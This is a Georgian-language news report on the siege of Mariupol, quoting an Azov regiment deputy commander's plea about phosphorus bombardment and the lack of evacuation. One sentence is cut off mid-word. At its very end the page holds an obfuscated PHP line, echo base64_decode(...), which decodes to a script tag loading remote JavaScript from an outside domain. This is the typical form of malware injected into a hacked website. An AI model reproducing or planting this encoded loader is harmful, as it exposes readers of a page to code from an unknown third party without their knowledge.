celsiusi
ავერსი საქკაბელი
მარიუპოლში კვლავ უცვლელი ვითარებაა - საპორტო ქალაქი კატასტროფულ მდგომარეობაშია, არ არის წყალი და ელექტროენერგია, საკვები და მედიკამენტები. მართალია ქალაქი ოკუპანტებმა მიწასთან გაასწორეს, თუმცა მარიუპოლი ისევ უკრაინის ნაწილია და დგას, არ ნებდება "აზოვსტალი". აღმოსავლეთ და სამხრეთ ნაწილში კონცენტრაციის ფონზე, შედარებით მშვიდი ვითარებაა კიევის ოლქში.
 
"აზოვის" პოლკის მეთაურის მოადგილე სვიატოსლავ პალამარი ამბობს, რომ უკრაინული მხარისთვის ცარიელი დაპირებების მოსმენა შემდგომი ქმედებების გარეშე რთული მოსასმენია. ის 
 
​"გასულ ღამეს მტერმა კოლოსალური რაოდენობის ფოსფორის ბომბები გამოიყენა. განხორციელდა 50 დარტყმა, რაკეტებით, საარტილერიო ჭურვებით და ყველაფრით, რისი გამოყენებაც ბარბაროსებს კაცობრიობის წინააღმდეგ შეუძლიათ.
 
ვის შეუძლია გაგვცეს პასუხი, თუ რატომ ვართ მარტო მტრის წინაშე, რომელიც უკვე 64 წელია გვებრძვის? დიახ, ეს არ არის შეცდომა, რადგან მარიუპოლში ერთი დღე სწორედ ერთი წელიწადის ტოლფასია. ჩვენ ისევ ვდგავართ, პოზიციას ვიკავებთ, ვინარჩუნებთ თავდაცვის ხაზს, მაგრამ კიდევ რამდენი ხანი შევძლებთ ამას?
 
ჩვენთვის ძნელი მოსასმენია ცარიელი დაპირებები, შემდგომი ქმედებების გარეშე. მოვუწოდებ სამხედრო-პოლიტიკურ ხელმძღვანელობას, დაუყოვნებლივ განახორციელონ გადამწყვეტი მოქმედებები და მოსახლეობის ევაკუაცია მოახდინონ," - განაცხადა მან.
727
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");